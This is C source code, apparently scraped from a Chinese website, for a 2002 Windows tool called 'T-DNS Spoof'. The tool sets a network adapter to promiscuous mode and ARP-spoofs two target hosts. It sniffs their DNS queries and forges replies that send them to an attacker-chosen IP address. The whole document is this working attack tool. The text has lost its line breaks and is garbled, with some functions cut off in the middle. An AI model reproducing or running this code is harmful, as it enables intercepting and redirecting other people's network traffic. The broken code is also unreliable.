#include #include #define ETH_IP 0x0800#define ETH_ARP 0x0806#define ARP_REQUEST 0x0001#define ARP_REPLY 0x0002#define ARP_HARDWARE 0x0001#define MAX_NUM_ADAPTER 10#define NDIS_PACKET_TYPE_PROMISCUOUS 0x0020#pragma pack(push,1)typedef strUCt ethdr{ unsigned char eh_dst[6]; unsigned char eh_src[6]; unsigned short eh_type;}ETHDR,*PETHDR;typedef struct arphdr{ unsigned short arp_hdr; unsigned short arp_pro; unsigned char arp_hln; unsigned char arp_pln; unsigned short arp_opt; unsigned char arp_sha[6]; unsigned long arp_spa; unsigned char arp_tha[6]; unsigned long arp_tpa;}ARPHDR,*PARPHDR;typedef struct iphdr{ unsigned char h_lenver; unsigned char tos; unsigned short total_len; unsigned short ident; unsigned short frag_and_flags; unsigned char ttl; unsigned char protocol; unsigned short checksum; unsigned int sourceip; unsigned int destip;}IPHDR,*PIPHDR;typedef struct psd{ unsigned int saddr; unsigned int daddr; char mbz; char ptcl; unsigned short udpl;}PSD,*PPSD;typedef struct udphdr{ unsigned short souceport; unsigned short destport; unsigned short length; unsigned short checksum;}UDPHDR,*PUDPHDR;typedef struct dns{ unsigned short id; unsigned short flags; unsigned short quests; unsigned short answers; unsigned short author; unsigned short addition;}DNS,*PDNS;typedef struct query{ unsigned short type; unsigned short classes;}QUERY,*PQUERY; typedef struct response{ unsigned short name; unsigned short type; unsigned short classes; unsigned int ttl; unsigned short length; unsigned int addr;}RESPONSE,*PRESPONSE;#pragma pack(pop)unsigned short checksum(USHORT *buffer,int size){ unsigned long cksum=0; while(size>1) { cksum+=*buffer++; size-=sizeof(unsigned short); } if(size) cksum+=*buffer; cksum=(cksum>>16)+(cksum & 0xffff); cksum+=(cksum>>16); return (unsigned short)(~cksum);}LPADAPTER lpadapter=0;LPPACKET lppacketr,lppackets;IPAddr myip,firstip,secondip,virtualip;UCHAR mmac[6]={0},fmac[6]={0},smac[6]={0};char adapterlist[MAX_NUM_ADAPTER][1024];void start(){ printf("===[ T-DNS Spoof, by TOo2y ]===\n"); printf("===[ E-mail: [email protected] ]===\n"); printf("===[ Homepage: _blank>www.safechina.net ]===\n"); printf("===[ Date: 10-15-2002 ]===\n\n"); return;}void usage(){ printf("Usage: T-DNS Firstip Secondip Virtualip\n"); return;}DWord WINAPI sniff(LPVOID no){ printf("\nI am sniffing...\n"); char *buf; char *pchar; char temp[1024]; char sendbuf[1024]; char recvbuf[1024*250]; struct bpf_hdr *hdr; unsigned char *dname; unsigned long ulbytesreceived,off,ulen; ETHDR ethr,eths; IPHDR ipr,ips; PSD psds; UDPHDR udpr,udps; DNS dnsr,dnss; QUERY queryr,querys; RESPONSE responses; if(PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE) { printf("Warning: Unable to set the adapter to promiscuous mode!\n"); } if(PacketSetBuff(lpadapter,500*1024)==FALSE) { printf("PacketSetBuff Error: %d\n",GetLastError()); return -1; } if(PacketSetReadTimeout(lpadapter,1)==FALSE) { printf("Warning: Unable to set the timeout!\n"); } if((lppacketr=PacketAllocatePacket())==FALSE) { printf("PacketAllocatePacket Receive Error: %d\n",GetLastError()); return -1; } PacketInitPacket(lppacketr,(char *)recvbuf,sizeof(recvbuf)); while(1) { if(PacketReceivePacket(lpadapter,lppacketr,TRUE)==FALSE) { break; } ulbytesreceived=lppacketr->ulBytesReceived; buf=(char *)lppacketr->Buffer; off=0; while(offbh_hdrlen; pchar=(char *)(buf+off); off=Packet_WORDALIGN(off+hdr->bh_caplen); ethr=*(ETHDR *)pchar; if(ethr.eh_type==htons(ETH_IP)) { ipr=*(IPHDR *)(pchar+sizeof(ETHDR)); if(ipr.protocol!=17) { continue; } if((ipr.sourceip!=secondip) && (ipr.sourceip!=firstip)) { continue; } udpr=*(UDPHDR *)(pchar+sizeof(ETHDR)+sizeof(IPHDR)); ulen=ntohs(udpr.length)-sizeof(UDPHDR)-sizeof(DNS)-sizeof(QUERY); dname=(unsigned char *)malloc(ulen*sizeof(unsigned char)); if(udpr.destport==htons(53)) { printf("Get a DNS Packet...\t"); memset(sendbuf,0,sizeof(sendbuf)); memcpy(&dnsr,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR),sizeof(DNS)); memcpy(dname,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS),ulen); memcpy(&queryr.type,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen,2); memcpy(&queryr.classes,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen+2,2); responses.name=htons(0xC00C); responses.type=queryr.type; responses.classes=queryr.classes; responses.ttl=0xFFFFFFFF; responses.length=htons(4); responses.addr=virtualip; querys.classes=queryr.classes; querys.type=queryr.type; dnss.id=dnsr.id; dnss.flags=htons(0x8180); dnss.quests=htons(1); dnss.answers=htons(1); dnss.author=0; dnss.addition=0; udps.souceport=udpr.destport; udps.destport=udpr.souceport; udps.length=htons(sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY)+sizeof(RESPONSE)); udps.checksum=0; ips.h_lenver=(4IpAddressList); myip=inet_addr(paddrstr->IpAddress.String); ullen=6; memset(pulmac,0xff,sizeof(pulmac)); destip=firstip; if((hr=SendARP(destip,0,pulmac,&ullen))!=NO_ERROR) { printf("SendARP firstip Error: %d\n",GetLastError()); return FALSE; } memcpy(fmac,pulmac,6); memset(pulmac,0xff,sizeof(pulmac)); destip=secondip; if((hr=SendARP(destip,0,pulmac,&ullen))!=NO_ERROR) { printf("SendARP secondip Error: %d\n",GetLastError()); return FALSE; } memcpy(smac,pulmac,6); return TRUE;}int main(int argc,char *argv[]){ HANDLE thread[2]; WCHAR adaptername[8192]; WCHAR *name1,*name2; ULONG adapterlength; DWORD threadsid,threadrid; int adapternum=0,open,i; system("cls.exe"); start(); if(argc!=4) { usage(); return -1; } firstip=inet_addr(argv[1]); secondip=inet_addr(argv[2]); virtualip=inet_addr(argv[3]); if(getmac()==FALSE) { return -1; } adapterlength=sizeof(adaptername); if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE) { printf("PacketGetAdapterNames Error: %d\n",GetLastError()); return -1; } name1=adaptername; name2=adaptername; i=0; while((*name1!='\0') (*(name1-1)!='\0')) { if(*name1=='\0') { memcpy(adapterlist[i],name2,2*(name1-name2)); name2=name1+1; i++; } name1++; } adapternum=i; printf("Adapters Installed: \n"); for(i=0;i { wprintf(L"%d - %s\n",i+1,adapterlist[i]); } do { printf("\nSelect the number of the adapter to open: "); scanf("%d",&open); if(open>=1 && openhFile==INVALID_HANDLE_VALUE)) { printf("PacketOpenAdapter Error: %d\n",GetLastError()); return -1; } if((lppackets=PacketAllocatePacket())==FALSE) { printf("PacketAllocatePacket Send Error: %d\n",GetLastError()); return -1; } thread[0]=CreateThread(NULL,0,sniff,NULL,0,&threadrid); if(thread[0]==NULL) { printf("CreateThread for sniffer Error: %d\n",GetLastError()); return -1; } thread[1]=CreateThread(NULL,0,arpspoof,NULL,0,&threadsid); if(thread[1]==NULL) { printf("CreateThread for arpspoof Error: %d\n",GetLastError()); return -1; } WaitForMultipleObjects(2,thread,FALSE,INFINITE); CloseHandle(thread[0]); CloseHandle(thread[1]); PacketFreePacket(lppackets); PacketFreePacket(lppacketr); PacketCloseAdapter(lpadapter); return 0;}
[1] [2]
(出处:http://www.sheup.com)